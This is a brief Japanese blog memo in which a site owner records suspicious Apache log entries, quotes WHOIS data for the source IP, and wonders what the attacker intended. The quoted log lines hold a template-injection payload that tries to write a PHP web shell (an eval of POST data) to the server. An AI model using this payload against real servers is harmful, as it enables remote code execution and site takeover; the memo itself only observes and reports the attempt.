Apache Webサーバーに、またまた変なログが記録されていることに気付きましたので、そのメモ。
122.51.78.36 - - [16/Nov/2019:22:07:50 +0900] "GET /?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('hmseo.php','<?php%20@eval($_POST[hm]);?>hmseo')</php> HTTP/1.1" 200 2472 "https://www.lifewithunix.jp/?a=fetch&templateFile=public/index&prefix=''&content=php>file_put_contents('hmseo.php','<?php @eval($_POST[hm]);?>hmseo')</php>" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 122.51.78.36 - - [16/Nov/2019:22:07:55 +0900] "GET /hmseo.php HTTP/1.1" 404 1182 "https://www.lifewithunix.jp/hmseo.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
IPアドレスがどこのものかと調べてみると、予想通り中国。
% Information related to '122.51.0.0 - 122.51.127.255' % Abuse contact for '122.51.0.0 - 122.51.127.255' is 'ip@cnispgroup.com' inetnum: 122.51.0.0 - 122.51.127.255 netname: hitiit descr: Guangzhou Haizhiguang communication technology Limited descr: Room601,Information Hub Building,No.1 Zhong Six Road descr: Higher Education Mega Center,Panyu District,Guangzhou country: CN admin-c: KJ422-AP tech-c: LZ2742-AP status: allocated non-portable mnt-by: MAINT-AP-CNISP mnt-irt: IRT-CNISP-CN last-modified: 2014-06-17T03:02:14Z source: APNIC
phpのセキュリティーホールを狙ったもの?
一体、何がしたいのか。